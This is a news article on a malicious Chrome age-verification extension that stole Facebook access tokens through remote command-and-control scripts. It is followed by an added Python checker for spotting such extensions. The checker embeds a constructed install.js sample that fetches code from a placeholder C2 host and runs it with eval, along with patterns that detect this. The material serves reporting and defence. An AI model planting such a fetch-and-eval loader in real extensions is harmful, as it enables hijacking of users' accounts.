
“Intrigued, I decided to go down the rabbit hole and see what this was all about,” wrote Kjaer, a 19-year-old computer science student at the Swiss Federal Institute of Technology, in a blog post Monday.

What he found was what he called a “glaring security hole” in the Google Chrome Webstore that allowed malware authors to infect Chrome browsers via a bogus age verification extension.

The malware-laced extension, called “Viral Content Age Verify,” allowed a third party to “read and change all your data on the websites you visit” and potentially “read your emails, steal all your login credentials, have you DDoS someone, mine Bitcoin, seed pirated content… You name it. That even includes reading and leaking your credit card information, if you ever are to type that in,” Kjaer wrote.

Kjaer’s trip down the rabbit hole began when he clicked Like on a “semi-raunchy” item one of his Facebook friends had Liked. As soon as he did, he was asked to verify his age by installing the Viral Content Age Verify Chrome browser extension.

After agreeing to install the extension, Kjaer found that its metadata file, manifest.json, loaded three scripts: background.js, query-string.js and install.js. The background.js and query-string.js scripts are innocuous. The install.js script, however, fetches the malware payload from two hard-coded URLs. “The first URL is to get instructions from a server (C2), and the second one is to report back to it,” he wrote.

Once the scripts ran, the C2’s instructions were to steal Facebook access tokens (the equivalent of a username and password) so that the malware authors could control the victim’s Facebook account. The first thing the malware did with a hijacked Facebook account was to Like a Facebook page called VVideosss.

While Kjaer said the malware functions he documented were Facebook-specific, he noted that the credential-stealing function also applied to YouTube. Once credentials are collected, he observed, the malware reports back to the C2 with information identifying the infected machine, which version of the age verification extension is running and whether the user is currently logged into Facebook.

Altogether, Kjaer said, there were nine identical variations of the Viral Content Age Verify extension on the Google Chrome Webstore with a cumulative total of 132,265 users. Kjaer notified both Google and the C2 servers’ hosting company, DigitalOcean, of the malware. Both Google and the hosting firm took immediate action, taking down the servers and blacklisting the extensions.

“All the machines technically remain infected, but the malware will be defused. Still, that’s a patched security vulnerability on 130,000 machines at once. A drop in the ocean compared to the size of the Internet, but still a decent catch if you ask me,” Kjaer wrote.

Google did not immediately respond to Threatpost’s request for comment, but the company did reply to Kjaer and confirmed it had blacklisted the Age Verification extensions. Will Harris, a member of Chrome’s security team, told Kjaer that blacklisted extensions are also automatically removed from users’ computers.

@maximekjaer Extensions that are blacklisted in the Chrome web store do get automatically removed from all users who have them installed.

Kjaer commended Google’s move but still blasted the company for its approach to Chrome extension security.

“The fact is that the current malware detection on the Chrome Webstore is a joke,” he wrote. “Currently, all it takes to get around it is to download the payload on installation rather than shipping with it. This has been the case for years now, and it doesn’t seem like Google is doing much about it. They offer 5-digit bug bounties for vulnerabilities in Chrome, and yet they leave this glaring security hole virtually unguarded!”
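A static check for the pattern Kjaer describes, both in the extension's layout (a manifest that declares background scripts, one of which pulls its payload from hard-coded URLs) and in his complaint that malware evades store review by downloading the payload at install time. This is an added example, not code from the original article or from Kjaer's own analysis: the sample manifest, the three script bodies and the example.invalid URLs are constructed stand-ins for the real extension, and `audit_extension` is a hypothetical reviewer-side helper that flags broad host permissions and any background script that both contacts hard-coded endpoints and executes fetched code.

```python
import json
import re

# Constructed sample extension modelled on the article's description (not the
# real "Viral Content Age Verify" code): a manifest v2 file that declares three
# background scripts, one of which pulls its payload from hard-coded URLs.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 2,
        "name": "Constructed age-verify sample",
        "version": "1.0",
        "permissions": ["<all_urls>", "cookies", "tabs"],
        "background": {"scripts": ["background.js", "query-string.js", "install.js"]},
    }),
    "background.js": "chrome.runtime.onInstalled.addListener(function () { console.log('ready'); });",
    "query-string.js": "function parse(q) { return q.split('&'); }",
    "install.js": (
        "var C2 = 'https://c2.example.invalid/instructions';\n"   # constructed placeholder
        "var REPORT = 'https://c2.example.invalid/report';\n"     # constructed placeholder
        "fetch(C2).then(function (r) { return r.text(); }).then(function (code) { eval(code); });\n"
    ),
}

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Code that turns downloaded text into running code: eval(...) or new Function(...)
REMOTE_EXEC_RE = re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")
BROAD_HOST_PERMS = {"<all_urls>", "http://*/*", "https://*/*"}

def audit_extension(files):
    """Return (file, finding) pairs for an unpacked extension given as {name: text}."""
    manifest = json.loads(files["manifest.json"])
    findings = []
    if set(manifest.get("permissions", [])) & BROAD_HOST_PERMS:
        findings.append(("manifest.json",
                         "broad host permission: can read and change data on every site"))
    for name in manifest.get("background", {}).get("scripts", []):
        src = files.get(name, "")
        urls = URL_RE.findall(src)
        if not urls:
            continue  # no hard-coded endpoints in this script
        if REMOTE_EXEC_RE.search(src):
            findings.append((name, f"fetches from {len(urls)} hard-coded URL(s) and executes remote code"))
        else:
            findings.append((name, f"contacts {len(urls)} hard-coded URL(s)"))
    return findings

if __name__ == "__main__":
    for path, finding in audit_extension(SAMPLE_EXTENSION):
        print(f"{path}: {finding}")
```

On the constructed sample only install.js is flagged, which matches the article's split between the two innocuous scripts and the one that fetches its payload after installation; a script that merely contacts a hard-coded URL without evaluating the response is reported at a lower severity.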


Authors

Threatpost
